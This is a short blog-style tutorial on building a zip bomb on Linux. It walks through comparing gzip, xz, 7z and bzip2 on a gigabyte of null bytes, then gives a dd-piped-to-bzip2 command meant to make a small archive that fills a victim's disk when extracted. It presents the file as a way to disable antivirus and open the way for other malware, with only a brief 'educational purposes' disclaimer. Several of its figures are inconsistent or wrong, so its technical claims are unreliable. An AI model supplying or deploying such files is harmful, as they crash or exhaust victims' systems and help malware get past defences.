Creating Zip Bombs In Linux

Creating Zip Bombs In Linux

A zip bomb, also known as a decompression bomb or zip of death is a malicious archive file designed to crash or render useless the program or system reading it. It is one of the oldest “malicious files” going around on the internet. In this module, we’ll create learn to create a zip bomb in Linux!

What Are Zip Bombs?

Zip bombs are malicious compressed, archive files which are often used to disable anti-viruses and make way for other malware and trojans to make way.

Zip Bombs render the programs or the system reading it useless.

Zip bombs are small files which encompass HUGE amounts of data. The Zip bomb itself is a very tiny file to avoid suspicion but when unpacked, its contents are more than the system can handle.  This causes the system to run out of memory and crash in the process!

Various Compression Programs

The popular compression programs in Linux include:

The programs use different algorithms to compress a file. Thus we need to find the most efficient one among them!

Comparing The Different Compression Methods

Before we begin, let’s create a 1GB file comprising of identical characters:

$ dd if=/dev/zero of=data.null bs=1M count=1024

This should give us a 1GB file of just null characters:

$ ls -lah data.null
-rw-rw-r-- 1 mint mint 1.0G Apr 18 12:24 data.null

Now we need would compress the same using all the above tools to see which one is the best:

$ gzip -c data.null > data.null.gz
$ tar -cf data.null.tar data.null
$ xz -zk data.null
$ 7za a -t7z data.null.7z data.null
$ bzip2 -zk data.null

If we have a look at the size of resultant compressed files you would find the following ls command:

$ ls -lah
total 2.1G
drwxrwxr-x  2 mint mint  4.0K Apr 18 14:18 .
drwxr-xr-x 18 mint mint  4.0K Apr 18 14:18 ..
-rw-rw-r--  1 mint mint  1.0G Apr 18 12:24 data.null
-rw-rw-r--  1 mint mint  149K Apr 18 14:21 data.null.7z
-rw-rw-r--  1 mint mint   785 Apr 18 12:24 data.null.bz2
-rw-rw-r--  1 mint mint 1018K Apr 18 14:11 data.null.gz
-rw-rw-r--  1 mint mint  1.1G Apr 18 14:15 data.null.tar
-rw-rw-r--  1 mint mint  153K Apr 18 12:24 data.null.xz

From the following, we can conclude 2 things :

  • tar increases the size of the file [ though to be accurate, it isn’t even a compression algorithm ]
  • bzip2 seems to be the most efficient compression as it compresses the 1GB file down to a few bytes

Creating A Zip Bomb

Now that we have a very efficient method of creating zip files, we can create our zip bomb. However, creating a file of null characters and then compressing it isn’t the most ideal way to make a Zip Bomb as it limits us to the size of the zip bomb we can produce.

Thus a more efficient method would be to use the following syntax :

$ dd if=/dev/zero bs=10G count=10000 | bzip2 -c > batman.bz2

This compresses 100TB of data into a file of approximately 14.9MB. Thus when someone tries to extract it, it should expand to more than 1300000x times its size and their hard drive should be filled will null characters!

Conclusion

Thus, in this module we saw how to make a Zip bomb. However, it is for purely educational purposes. Zip bombs don’t do much damage themselves but pave the way for other malware and such, helping them to bypass antiviruses and the defense systems !